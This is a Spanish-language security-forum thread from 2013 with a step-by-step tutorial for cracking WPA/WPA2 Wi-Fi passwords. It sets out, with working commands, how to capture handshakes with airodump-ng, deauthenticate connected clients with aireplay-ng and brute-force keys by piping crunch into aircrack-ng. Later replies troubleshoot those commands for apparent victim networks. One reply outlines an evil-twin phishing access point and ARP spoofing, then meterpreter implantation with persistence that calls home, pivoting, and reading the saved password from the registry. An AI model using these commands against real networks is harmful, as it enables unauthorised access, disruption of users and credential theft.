Hack x Crack - Comunidad de Seguridad informática

Seguridad Informatica => Hacking => Hacking Wireless => Mensaje iniciado por: JAG en Marzo 21, 2013, 12:32:03 pm

Título: Romper WPA y WPA2 con crunch.
Publicado por: JAG en Marzo 21, 2013, 12:32:03 pm
Hola a todos!!

Ya se ha hablado en muchas ocasiones sobre como auditar una red wifi la cual use seguridad del tipo WPA/WPA2. El caso es que siempre se sugería intentar conseguir el handshake para después hacer uso de algún diccionario que, en muchas ocasiones, estaba en otros idiomas y ni en broma contenía combinaciones de letras que pudiesen formar la contraseña que buscábamos. Posteriormente se ha aconsejado hacer uso de la vulnerabilidad que muchos routers tienen con el WPS activo, usando reaver podremos en unas horas conseguir la contraseña que utiliza la red a auditar. Sin embargo, es algo ya conocido por muchos esta vulnerabilidad y cada vez menos gente lo tiene activo, es por eso que quería explicar un poco como funciona la herramienta "crunch" y el por qué es más cómoda que usar un diccionario.

Antes de comenzar quiero dejar claro que esto es para redes que usan seguridad WPA/WPA2, como todo el mundo (que controle un poco sobre este tema) debe saber, en el caso de que el router use la nefasta seguridad que proporciona el cifrado WEP únicamente se debe capturar paquetes para luego a partir de estos conseguir la clave pero sin necesidad de handshakes ni historias parecidas. Una vez aclarado esto, empecemos!

Primero vamos a descargar este software llamado crunch desde aquí (http://sourceforge.net/projects/crunch-wordlist/files/). Decir que viene incluido en muchos sistemas operativos Linux dedicados a hacer auditorias wifi tales como Wifiway, backtrack, etc, esos pueden saltarse la explicación de instalación del programa.

Una vez descargado nos dirigimos a la carpeta donde se encuentra y lo descomprimimos.
Código: [Seleccionar]
tar -xvzf crunch*.tgz
Posteriormente entramos a la carpeta descomprimida para poder compilar el código, aclarar que quizás os haga falta el build-essential para esta tarea, os dejo el comando para instalarlo por si no lo tienen.
Código: [Seleccionar]
cd crunch
/*Instalar build-essential*/
apt-get install build-essential
/*Para compilar*/
make
make install
Por ultimo nos queda añadir el comando al sbin para poder ejecutarlo desde la termina de forma cómoda.
Código: [Seleccionar]
cp crunch /usr/sbin/
Supongo que si ya han hecho auditorias wifi alguna vez tendrán instalado el aircrack-ng, pero bueno, si están empezando en esto mejor se los dejo y os ahorro complicaciones y calentamientos de cabeza (que siempre los tenemos en las primeras veces).
Código: [Seleccionar]
apt-get install aircrack-ng
Como ya he explicado en alguna ocasión ponemos la tarjeta de red en modo monitor...
Código: [Seleccionar]
airodump-ng wlan0
Escaneamos para elegir nuestra red y una vez que esté localizada ejecutamos lo siguiente:
Código: [Seleccionar]
airodump-ng -c Numero_del_canal --bssid MAC_de_la_red -w Nombre mon0
/*mon0 es nuestra tarjeta en modo monitor*/

Ahora tras esto podemos seguir dos caminos, podemos esperar a que un cliente se conecte para obtener el ansiado handshake (lo cual es aburrido), o si tenemos la suerte de que ya hay un cliente conectado podemos proceder a desautenticarlo para que se vuelva a conectar y así obtener el handshake. Imaginemos que hemos tenido suerte y al haber un cliente conectado nos ahorramos la larga espera de que se conecte alguien, hagamos uso de aireplay-ng para echarlo de la red...
Código: [Seleccionar]
aireplay-ng -0 10 -a MAC_de_la_red -c MAC_del_cliente mon0Así cuando se conecte de nuevo obtendremos el handshake, si no es así, probemos otra vez, da igual que parezcamos unos cansinos xD

Una vez conseguido el handshake es donde hacemos uso de la herramienta crunch. Escribamos algo así como:
Código: [Seleccionar]
crunch 10 11 0123456789 | aircrack-ng -a 2 Archivo_.cap -e Nombre_de_la_red -b Handshake -w -Explicando un poco que es lo que hacemos os digo, estoy probando a pasarle a aircrack-ng usando un pipe ( | ) la salida de crunch, ¿cual es esta salida? En mi caso estoy probando con combinaciones de números de longitud 10 (como es el caso de las redes ONO) y cuya longitud máxima será de 11 caracteres, además le pasamos a aircrack-ng el archivo.cap y el Handshake que hemos obtenido. Os pondré un ejemplo que facilitará un poco la utilización de crunch...
Código: [Seleccionar]
crunch 10 11 0123456789 | aircrack-ng -a 2 /home/desktop/ONO*.cap -e ONOXXXX -b 00:11:22:33:44:55 -w -
Fácil ¿verdad?, ya solo queda esperar a tener suerte y que demos con la clave... si por ejemplo quisiéramos probar con combinaciones de letras (aunque alargará mucho la tarea) podemos hacerlo de la siguiente manera:
Código: [Seleccionar]
crunch 5 6 abcdefghijklmnopqrstuvwxyzDonde probará con combinaciones de estas letras con longitud máxima 6. Es sencillo... prueben y verán!
Para terminar quiero añadir que también permite crear diccionarios a nuestro gusto, pero creo que es más eficiente pasar la salida de crunch a la entrada de aircrack-ng, así ahorramos en memoria que muchas veces suele ser escasa en estos casos...
Saludos!!
Título: Re:¿Conocen crunch?
Publicado por: <[Zoro]248> en Marzo 21, 2013, 02:17:30 pm
Excelente JAG, esta manera no la conocia, sin duda una opcion interesante

Pd: Buen blog no sabia que tenias xD
Título: Re:¿Conocen crunch?
Publicado por: Sigma en Marzo 21, 2013, 03:21:19 pm
Se ve bueno, lo probare, gracias JAG.
Saludos !
Título: Re:¿Conocen crunch?
Publicado por: @NetFcruz en Marzo 21, 2013, 03:51:32 pm
Lo porbare JAG se ve bueno espero obtener la pass del modem que no eh podido quitar.
Saludos XD
Título: Re:¿Conocen crunch?
Publicado por: JAG en Marzo 21, 2013, 10:27:03 pm
Me alegro de que les haya gustado... la verdad es que es algo viejo este método, creía que lo conocerían. Está basado en la fuerza bruta pero sin la necesidad de crear o descargar pesados diccionarios...
Saludos!!
Título: Re:¿Conocen crunch?
Publicado por: Krakakanok en Marzo 21, 2013, 11:23:01 pm
Como bien dices JAG el metodo es viejo, bastante, pero aun asi sigue siendo muy válido.

La ventaja de este método es que ahorras espacio en diccionarios, normalmente (si es bueno lo es) pesados, por contra al tener que generar el diccionario al vuelo y probarlo a la vez la eficiencia de el metodo en cuanto a el tiempo total necesario es sensiblemente mayor.

Saludos.
Título: Re:¿Conocen crunch?
Publicado por: @NetFcruz en Marzo 21, 2013, 11:47:38 pm
Al menos no me eh metido mucho en ello, lo habia leido pero investigue mas, pero si que lo pruebo hoy.
Saludos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: MUFASA en Marzo 22, 2013, 03:05:57 am
JAG, te cambien el titulo, espero no te moleste, buen aporte...Salud2s!!
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: JAG en Marzo 22, 2013, 10:11:23 am
JAG, te cambien el titulo, espero no te moleste, buen aporte...Salud2s!!
jajajajaja no me molesta tío!! xD Hace ya mucho tiempo que no me decían esto...
Un saludo artista!!
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: elpre en Marzo 22, 2013, 04:29:02 pm
Una cosilla, que bueno, lo han dicho por arriba, pero al hacer fuerza bruta, realmente lo que hace es generar el diccionario él mismo y probarlo, no??? Entonces qué diferencia hay en crearte tu el diccionario??? No sería más rápido crear un diccionario que empiece por 10 caracteres y termine con 11 caracteres???
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: JAG en Marzo 22, 2013, 04:45:21 pm
Has leído los comentarios?? krakakanok lo ha descrito muy bien...
Va generando combinaciones de letras y números tal como le indiquemos (NO GENERA UN DICCIONARIO), y la salida de crunch generando estas combinaciones se le pasa a aircrack para que la pruebe, no gastamos en memoria al almacenar un pesado diccionario y es mucho más cómodo... al menos yo lo veo así.
Pero ya digo... que este método es algo viejo (aunque funcional), hay mucha información por internet sobre el...
Saludos!!
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: elpre en Marzo 22, 2013, 04:59:38 pm
Si ya entiendo que genera las combinaciones tal como se le ha dicho. Es decir, en el crunch en el ejemplo pone de 10 hasta 11 caracteres, digamos que empieza por aaaaaaaaaa y termina por zzzzzzzzzzz (antes de llegar aquí en teoría ha tenido que encontrar la clave en el supuesto que esté en ese rango). Mi pregunta es si el pc no necesita más recursos al tener que generar y probar a la vez en vez de teniendo el diccionario ya hecho con todas las combinaciones posibles.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: JAG en Marzo 22, 2013, 05:02:54 pm
¿más recursos? jejeje estará a tope durante quizás días... es lo malo de la fuerza bruta. Con este método solo he sacado una contraseña compuesta por 5 caracteres, dio la casualidad de que lo puse para esa longitud y lo dejé corriendo, cuando volví me la mostró... la fuerza bruta es aburrida y se necesita un poco de suerte también.
Saludos!
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: elpre en Marzo 22, 2013, 05:12:50 pm
5 caracteres??? mucha suerte eso, no??? jajajajaja. Yo de estos temas no tengo ni idea, lo único que conseguí fué un par de pass con wep y encima de w_lan o como se llamasen las de telefónica que el propio wifislax venía con un apartado para esas redes, así que no sé ni el tiempo ni memoria ni nada con la fuerza bruta. Pero entonces en teoría con diccionario costaría menos (en caso de que la pass esté en el diccionario claro)???
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Krakakanok en Marzo 22, 2013, 09:42:28 pm
Si costaria menos, como ya he dicho no se  te ahorras el tiempo de generacion de la cadena y te vas directamente a comprobarla.

Saludos.

PD: JAG cuanto tiempo tardaste en sacarla??
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: JAG en Marzo 23, 2013, 03:14:02 am
PD: JAG cuanto tiempo tardaste en sacarla??
Pues siéndote sincero no me acuerdo, fue cuando entré en primero de carrera hace 5 años... pero sería un día o día y medio. Hay que tener en cuenta que a más longitud más tiempo... con 5 caracteres no debería de tardar mucho, por eso probé con esa longitud.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: JIMI898 en Abril 24, 2013, 10:30:56 pm
JAG muchas gracias por el tutorial! Me ha costado un poco entender el lengauje del temrinal y pasarlo al script del wifiway 3.4 pero muy bueno, ahora stoy aki probandolo. si tengo suerte, dentro de 3 o 4 dias te digo como ha salido, me has ahorrado muchisimo espacio, ya staba apunto de generarme un diccionario, pero sabia que tu tendrias que saber mas del tema. En resumen GRACIAS! ;)
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: JAG en Abril 24, 2013, 10:48:45 pm
jejeje vaya JIMI898 no todos los días te agradecen de esta manera el trabajo realizado. Me alegro de que te haya ayudado y recuerda que para eso estamos aquí, para facilitarnos la tarea unos a otros... Quizá algún día necesite de tu ayuda...
Saludos!!!
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Rocky91 en Mayo 06, 2013, 10:34:09 am
Hola JAG buen tuto, pero dudo mucho que consigas sacar una WPA2 dado que ahora en estos tiempos es imposible o casi imposible ya que WPA2, la autenticacion lo decide el servidor o la base de datos de credenciales habiendo diferentes tipos como certificados, nombres de maquinas, usuarios...
Aunque el servidor de autenticacion puede pero no siempre almacenar credenciales.

¿Que quiere decir todo esto?

Que cuando el cliente se conecte al AP se traspasaran los certificados, (que tu no tienes).
En el caso que otro cliente que si lo tubiera, y tu lo decides sniffar, no podrias por que en el momento que se hace el intercambio de "credenciales" se tunela la conexión.

Ademas que WPA2 usa un motor criptográfico nuevo no basado en el RC4 que es el que usaba WEB y así promoviendo el sistema de cifrado de sesión.

Resumiendo, por que esto es muy largo... jejeje

Tienes que pasar una autenticación de doble banda, traspaso de credenciales, certificados, y servidor de autenticación.

¿Mi pregunta es?

¿Puedes de verdad romper una seguridad WPA2?

Las WPA TKIP PSK no digo que no, con fuerza fruta y un "poco" de espera se puede decir que la tienes jejeje.

Saludos a todos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Krakakanok en Junio 13, 2013, 12:11:42 pm
Hola JAG buen tuto, pero dudo mucho que consigas sacar una WPA2 dado que ahora en estos tiempos es imposible o casi imposible ya que WPA2, la autenticacion lo decide el servidor o la base de datos de credenciales habiendo diferentes tipos como certificados, nombres de maquinas, usuarios...
Aunque el servidor de autenticacion puede pero no siempre almacenar credenciales.

¿Que quiere decir todo esto?

Que cuando el cliente se conecte al AP se traspasaran los certificados, (que tu no tienes).
En el caso que otro cliente que si lo tubiera, y tu lo decides sniffar, no podrias por que en el momento que se hace el intercambio de "credenciales" se tunela la conexión.

Ademas que WPA2 usa un motor criptográfico nuevo no basado en el RC4 que es el que usaba WEB y así promoviendo el sistema de cifrado de sesión.

Resumiendo, por que esto es muy largo... jejeje

Tienes que pasar una autenticación de doble banda, traspaso de credenciales, certificados, y servidor de autenticación.

¿Mi pregunta es?

¿Puedes de verdad romper una seguridad WPA2?

Las WPA TKIP PSK no digo que no, con fuerza fruta y un "poco" de espera se puede decir que la tienes jejeje.

Saludos a todos.

Todo depende de la contraseña usada, no del proceso de autentificación.

Saludos.

PD: para las WPA lo mejor es atacar al WPS, como creo que sabras.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: j053c4 en Junio 14, 2013, 01:13:58 am
que interesante no había visto esta manera que dices... buen aporte .. gracias la probare..
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: anamar3311 en Julio 13, 2013, 03:30:24 am
buen aporte
, gracias!
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: masterbook2013 en Agosto 30, 2013, 05:27:32 am
He estado probando crunch, pero me asalta la siguiente duda: ¿Debo mantener abierta la terminal donde capturé el handshake mientras crunch hace su trabajo en la segunda terminal? o la puedo cerrar? Lo otro que he hecho, es cerrar crunch y seguir al otro día donde me quedé, sin volver a sacar el handshake,pensando que es el mismo siempre, no se si estará bien. he googleado buscando respuestas a estas interrogantes, pero nada. Saludos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Krakakanok en Agosto 30, 2013, 12:06:31 pm
He estado probando crunch, pero me asalta la siguiente duda: ¿Debo mantener abierta la terminal donde capturé el handshake mientras crunch hace su trabajo en la segunda terminal? o la puedo cerrar? Lo otro que he hecho, es cerrar crunch y seguir al otro día donde me quedé, sin volver a sacar el handshake,pensando que es el mismo siempre, no se si estará bien. he googleado buscando respuestas a estas interrogantes, pero nada. Saludos.

Puedes cerrar la terminal una vez conseguido el handshake, pero recuerda anotarle, recuerda que lo que necesitas es el handshake y el archivo cap; a lo segundo: no puedes pararlo, que yo sepa no tiene memoria al contrario que reaver para el WPS.

Saludos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: masterbook2013 en Agosto 30, 2013, 01:15:20 pm
OK, gracias. Me llama la atención que el handshake que sale en la terminal es el mismo que el BSSID, y al hacer el ataque con crunch obviamente lo escribo en la terminal, sin embargo no veo que se haya guardado el handshake en ninguna parte, ya que los archivos que captura airodump son 4: .cap .csv .kismet.csv .kismmet.nextxml y no veo el handshake, que debiera tener una forma, como 00:A3:C4:5F:6G:T6.cap. Por otro lado, si es posible guardar donde te quedaste y lanzar el ataque, sin embargo no sé si realmente está funcionando por lo que te comentaba acerca del handshake.Saludos nuevamente y gracias.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Krakakanok en Agosto 30, 2013, 01:21:27 pm
El mismo que el BSSID raro mmm. El handshake esta dentro del archivo cap que tiene todos los paquetes capturados de la red, pero no cambia a un formato especial ni nada, es un paquete más.

Saludos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: masterbook2013 en Septiembre 07, 2013, 12:56:25 am
Al final salió todo bien, el handshake correspondía al archivo .cap y obtuve la clave WPA2 PSK en 30 horas de trabajo, divididas en períodos de 5 horas diarias, para no forzar el PC. la clave fue numérica de 10 dígitos. Realmente crunch es muy bueno.
Saludos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Sighery en Septiembre 07, 2013, 03:11:40 am
A lo que decía Krakakanok:
"A lo segundo: no puedes pararlo, que yo sepa no tiene memoria al contrario que reaver para el WPS."

Ya no estoy muy enterado porque no he vuelto a intentarlo desde hace tiempo, pero recuerdo que lo que yo hacía era apuntar el número por el que se quedaba y luego al día siguiente reiniciarlo en ese mismo número, me parece que el comando era tal que así:
Código: [Seleccionar]
crunch A B <carácteres> | aircrack -s <número por el que empezar> -a 2 <ruta del .cap> -e REDXXXX -b XX:XX:XX:XX:XX:XX -w -Donde:
A= el mínimo de cifras que tiene la contraseña
B= el máximo de cifras que tiene la contraseña
<carácteres>= los dígitos o letras que usará, por ejemplo: 0123456789abcdefg
-s= la opción de añadir un dígito por el que empezar, por ejemplo, si tienes un mínimo y máximo de 10 dígitos, solo con números, pondrías: 1999999999 para empezar desde ese número
-e= essid
-b= bssid
-w= write

Creo que ese era el comando, no estoy del todo seguro, pero creo que sí era así, lo comento porque no lo he visto en el post principal, y para romper una ONO por ejemplo (10 dígitos de solo números), que necesitas a 5000 kbs, 12 horas (si no recuerdo mal, corregidme si me equivoco), si no tienes un ordenador tan potente quizás necesites dejarlo varios días, y asi con el -s puedes "dejarlo descansar".

Espero haber ayudado en algo ¡Hasta otra!
PD: ¿Alguien podría recordarme para que sirve el -a y ese 2 antes de la ruta del .cap?
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: masterbook2013 en Septiembre 07, 2013, 04:34:26 am
Me parece que es el mismo que use cada día y en la que solo cambié el NÚMERODONDEQUEDÓ:

./crunch 8 12 -f charset.lst numeric -s NUMERODONDEQUEDÓ | aircrack-ng -a 2 /RUTA/DELARCHIVO/NOMBREDELARCHIVO-01.cap -e NOMBREDELARED -b HANDSHAKE -w -

saludos y nuevamente un excelente programa
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Krakakanok en Septiembre 08, 2013, 11:52:42 am
Me lo apunto pues, siempre se aprenden cosas nuevas.

Saludos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Mr.X en Septiembre 22, 2013, 09:40:01 pm
¿Alguien sabe una manera de acelerar el crunch? es que estaba viendo que tarda mucho en probar las combinaciones de letras
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: masterbook2013 en Septiembre 23, 2013, 05:00:15 am
Me parece que la velocidad de crunch depende de la capacidad de tu procesador y del desgaste que le quieras dar a tu PC. Me explico. Uso crunch en un equipo con procesador de doble núcleo de 2.2 GHZ, pero evito que mi PC se sobrecaliente utilizando el programa jupiter en modo "saving Power", con el cual la temperatura no sobrepasa los 58°, y evito en lo posible que el procesador trabaje a toda potencia, ya que puede llegar a + de 90° y morir. Con crunch debes ser paciente y utilizar ingeniería social para "ADIVINAR" las password. Para ello crunch te guarda el ataque que estés haciendo y puedes seguir otro día desde donde quedó.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Mr.X en Septiembre 25, 2013, 04:34:08 am
Muchas gracias master solo una duda mas yo uso el wifiway que ya tiene el crunch y no se como guardar mi ataque me podrias orientar un poco o darme un tuto abusando de tu amabilidad gracias
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: masterbook2013 en Septiembre 26, 2013, 01:29:02 am
Ummmm en realidad no lo se, ya que Wifiway es un live CD. En realidad lo mejor para probar programas de auditoría de redes como son reaver, crunch, aircrack, es hacerlo en una distribución de GNU/LINUX nativa, es decir, intenta usar GNU/LINUX instalado en tu equipo. Si no quieres abandonar Windows, puedes contar con ambos sistemas operativos particionando tu disco duro.Verás lo fácil que es realizar las auditorías de redes desde GNU/LINUX. Saludos.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Mr.X en Septiembre 27, 2013, 03:09:12 am
Gracias master tienes razon linux es mejor lo probare
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Mr.X en Noviembre 28, 2013, 10:30:55 pm
crunch no me compila me aparece esto
/usr/bin/gcc -pthread -Wall -pedantic -std=c99 -m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 crunch.c -lm -o crunch
crunch.c: En la función ‘renamefile’:
crunch.c:1500:5: error: ‘pidret’ no se declaró aquí (primer uso en esta función)
crunch.c:1500:5: nota: cada identificador sin declarar se reporta sólo una vez para cada función en el que aparece
make: *** [crunch] Error 1
intente borrar la variable pidret pero no funciono alguien sabe como compilar?
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: noopynoob en Noviembre 28, 2013, 10:45:15 pm
crunch no me compila me aparece esto
/usr/bin/gcc -pthread -Wall -pedantic -std=c99 -m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 crunch.c -lm -o crunch
crunch.c: En la función ‘renamefile’:
crunch.c:1500:5: error: ‘pidret’ no se declaró aquí (primer uso en esta función)
crunch.c:1500:5: nota: cada identificador sin declarar se reporta sólo una vez para cada función en el que aparece
make: *** [crunch] Error 1
intente borrar la variable pidret pero no funciono alguien sabe como compilar?

no tienes que compilarlo, si usas backtrack o kali ya viene instalado y listo para usar, si usas otra distribucion y no lo tienes lo haces con el comando apt-get install crunch

en mi caso esta en /pentest/passwords/crunch/ imagino que en kali estara en la carpeta share, pero no creo que sea necesario
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: Mr.X en Noviembre 28, 2013, 11:19:47 pm
es que en backtrack y esos live cd no se guardar el ataque para seguir otro dia y en ubuntu 13.04 no se puede instalar con el comando sudo apt-get tienes que compilar
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: prank3r en Noviembre 29, 2013, 02:43:35 am
lo mejor q puedes hacer para conocer la password de una encriptacion wpa/2
es usando evil twin
creando un AP fake mayormente se usa un phishing pidiendote la clave q se almacena en tu base de datos
pro si la persona no coloca la password ?
la persona q se conect se le hace un arp_spoofing o un autopwn para infectarla
se le inyecta metsvc con el metasploit asi tendra un puerto con una meterpreter a la escucha
luego una persistencia q haga ping a un servidor una pagina nuestra q no apunte a nuestra IP esa web crea un log con las ip q se conecten
ya asi posteriormente nos podemos conectar a esa makina con su ip externa
siempre y cuando tengamos dichos puertos abiertos en nuestro router no va al tema
ahora haremos un proceso llamado
pivoting con metasploit si queremos desplazarnos por la red en busca de otras redes
aun con todo esto no sabemos la contraseña
bueno con una meterpreter en la makina bajamos sus registro o simplemente uno q es el q guarda la contraseña  usen ingeneria social son alternativas cuando no conseguimos dicha pass 
 

Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: noopynoob en Noviembre 29, 2013, 03:11:06 am
lo mejor q puedes hacer para conocer la password de una encriptacion wpa/2
es usando evil twin
creando un AP fake mayormente se usa un phishing pidiendote la clave q se almacena en tu base de datos
pro si la persona no coloca la password ?
la persona q se conect se le hace un arp_spoofing o un autopwn para infectarla
se le inyecta metsvc con el metasploit asi tendra un puerto con una meterpreter a la escucha
luego una persistencia q haga ping a un servidor una pagina nuestra q no apunte a nuestra IP esa web crea un log con las ip q se conecten
ya asi posteriormente nos podemos conectar a esa makina con su ip externa
siempre y cuando tengamos dichos puertos abiertos en nuestro router no va al tema
ahora haremos un proceso llamado
pivoting con metasploit si queremos desplazarnos por la red en busca de otras redes
aun con todo esto no sabemos la contraseña
bueno con una meterpreter en la makina bajamos sus registro o simplemente uno q es el q guarda la contraseña  usen ingeneria social son alternativas cuando no conseguimos dicha pass 

Fake AP para pishing ? primero el fake ap no te sirve para crackear una red, segundo el unico pishing que tienes que hacer es que la victima se conecte a ese ap de ahi puedes ver sus credenciales de cualquier pagina que la victima se conecte, si obtenemos su ip externa solo si tenemos suerte de que tenga el login por defecto sino nos jodemos y da igual tendriamos que crackear la pass del router, la forma es con aircrack y con algun diccionario, y si quieres obtenerla si o si por fuerza bruta como crunch que te ofrece para distintos contextos
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: prank3r en Diciembre 06, 2013, 05:35:30 pm
amiguito noopynoob
claro que se puede pro te falta un poco mas para entender eso
simplemente le vas abrir un puerto a la maquina y una persistencia que cada cierto tiempo visite nuestra pagina donde quedara grabada su ip externa yy como ya tiene un puerto abierto a la escucha de una meterpreter entramos a su makina
la pass esta guardada en el registro regedit
usa ingenieria social y listo
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: C_printfer en Diciembre 27, 2013, 10:53:06 pm
Hola!
¿Alguien podría echarme una mano con un error que obtengo y no tengo ni idea de por qué es?...

Cuando ejecuto el comando para expulsar a un usuario conectado a la red y obtener así el handshake obtengo un error. Los comando que ejecuto, en orden, son:

airmon-ng start wlan0
airodump-ng -w datos mon0

Y al ejecutar aireplay: aireplay-ng -0 4 -a MAC_PUNTO_ACCESO -c MAC_CLIENTE_A_EXPULSAR mon0

... obtengo este error:
22:43:36  Waiting for beacon frame (BSSID: MAC_PUNTO_ACCESO) on channel -1
22:43:36  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

Evidentemente, en las MACs meto la dirección, es decir, con numeritos y letritas, que hasta ahí mi inteligencia llega jejeje.

Saludos!! Gracias. 8)
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: noopynoob en Diciembre 27, 2013, 11:31:33 pm
Hola!
¿Alguien podría echarme una mano con un error que obtengo y no tengo ni idea de por qué es?...

Cuando ejecuto el comando para expulsar a un usuario conectado a la red y obtener así el handshake obtengo un error. Los comando que ejecuto, en orden, son:

airmon-ng start wlan0
airodump-ng -w datos mon0

Y al ejecutar aireplay: aireplay-ng -0 4 -a MAC_PUNTO_ACCESO -c MAC_CLIENTE_A_EXPULSAR mon0

... obtengo este error:
22:43:36  Waiting for beacon frame (BSSID: MAC_PUNTO_ACCESO) on channel -1
22:43:36  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

Evidentemente, en las MACs meto la dirección, es decir, con numeritos y letritas, que hasta ahí mi inteligencia llega jejeje.

Saludos!! Gracias. 8)

1ro. la proxima crea un nuevo tema

2do. te falto iniciar airodump para capturar el trafico y guardarlo en un .cap en la ruta determinada.

es decir justo antes de tipear lo ultimo, escribe esto:

airodump-ng INTERFAZ_DE_RED --channel CANAL --bssid MAC_A_ATACAR -w RUTA + HANDSHAKE

por ejemplo

airodump-ng mon0 --channel 1 --bssid 00:00:00:00:00 -w /root/handshake

luego abres otra consola y escribes el otro comando, es decir el que mencionaste este:

aireplay-ng -0 4 -a MAC_PUNTO_ACCESO -c MAC_CLIENTE_A_EXPULSAR mon0

asi deberia de funcionar.
Saludos
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: C_printfer en Diciembre 28, 2013, 11:30:16 pm
Ahora obtengo otro error... ¿Creo un tema nuevo o sigo por aquí ya?

Ejecuto esto:
airodump-ng MAC_PUNTO_ACCESO --channel 13 --bssid MAC_CLIENTE_A_ECHAR -w /root/handshake

Y el error es:
Connecting to 00 port 1...
Failed to connect
Interface MAC_PUNTO_ACCESO:
ioctl(SIOCGIFINDEX) failed: No such device

Me pierdo en lo de ruta+handshake... ¿qué ruta se pone?
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: noopynoob en Diciembre 28, 2013, 11:41:33 pm
en la ruta es el directorio donde quieres que se guarde el handshake, si quieres guardarlo en el directorio actual no pones la ruta,  solo el nombre del handshake que puede ser cualquiera.

primero no te confundas estas combinando los comandos, vamos por partes:

copio lo de arriba, primero pones la interface en modo monitor y cuando escanees la red va este comando:

airodump-ng INTERFAZ_DE_RED --channel CANAL --bssid MAC_A_ATACAR -w RUTA + HANDSHAKE

luego este

aireplay-ng -0 4 -a MAC_PUNTO_ACCESO -c MAC_CLIENTE_A_EXPULSAR mon0

notas lo errores que estas cometiendo? de ahí ya quedaría hacer el ataque criptografico.

Aprovecho para preguntar porque no vale la pena hacer un tema por esto: se puede guardar el handshake de  un wpa (el .cap) para luego desencriptar la clave por diccionario (cuando el AP no este presente)?
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: C_printfer en Diciembre 29, 2013, 11:47:20 am
Pues no sé si lo hago bien o no... porque tras poner la red en modo monitor necesito escanear, y según lo que entiendo de lo que dices es que hay que escanear antes de hacer esto:

airmon-ng start wlan0


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
651     avahi-daemon
653     wpa_supplicant
739     NetworkManager
1521    dhclient
Process with PID 1521 (dhclient) is running on interface wlan0


Interface       Chipset         Driver

wlan0           Broadcom        b43 - [phy0]
                                (monitor mode enabled on mon0)

----------------------------------------
Y mi pregunta es: ¿cómo sabes las MAC y el canal si no has escaneado antes?

EDITO que me olvidaba: es muy interesante lo de abrir el post que dices. :o
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: noopynoob en Diciembre 29, 2013, 03:59:39 pm
cuando escribí ese comando supuse que ya los sabias porque ya habrás escaneado las redes, si no lo sabes con el comando airodump-ng mon0, luego de haber escaneado busca tu ssid victima con su correspondiente canal y mac que estan en las otras columnas.

empezando desde cero los comandos serian:

airmon-ng start wlan0
airodump-ng mon0
airodump-ng INTERFAZ_DE_RED --channel CANAL --bssid MAC_A_ATACAR -w RUTA + HANDSHAKE

en tu caso:

INTERFAZ_DE_RED = mon0
RUTA + HANDSHAKE = cualquiercosa  (si va en el directorio actual)
el canal y la mac estan en las columnas cuando hiciste el escaneo

aireplay-ng -0 4 -a MAC_PUNTO_ACCESO -c MAC_CLIENTE_A_EXPULSAR  mon0

 MAC_PUNTO_ACCESO  es lo mismo que la MAC anterior
MAC_CLIENTE_A_EXPULSAR es la STATION

y ya veras como rompes la contraseña

supongamos que la victima es KATKA.
(http://img827.imageshack.us/img827/9393/ni99.png)
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: C_printfer en Diciembre 29, 2013, 08:25:08 pm
Muchísimas gracias por tus molestias, te curras las respuestas para que retrasados como yo las podamos entender jejeje. :'(

Lo peor es que hace tiempo aprendí a usarlo, pero como me daba errores se me olvidó, y creo que los errores eran los mismos que me salen ahora. He seguido exactamente tus pasos, y todo sin problemas hasta que ejecuto aireplay:

aireplay-ng -0 4 -a XXXXXXXXXXXXXX -c YYYYYYYYYYYYY mon0
20:17:53  Waiting for beacon frame (BSSID: XXXXXXXXXXXXX) on channel -1
20:17:53  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

Así que luego hago:

aireplay-ng -0 4 -a XXXXXXXXXXXXXX -e NOMBRE_DE_MI_RED -c YYYYYYYYYYYYYYY mon0
20:18:44  Waiting for beacon frame (BSSID: XXXXXXXXXXXXXX) on channel -1
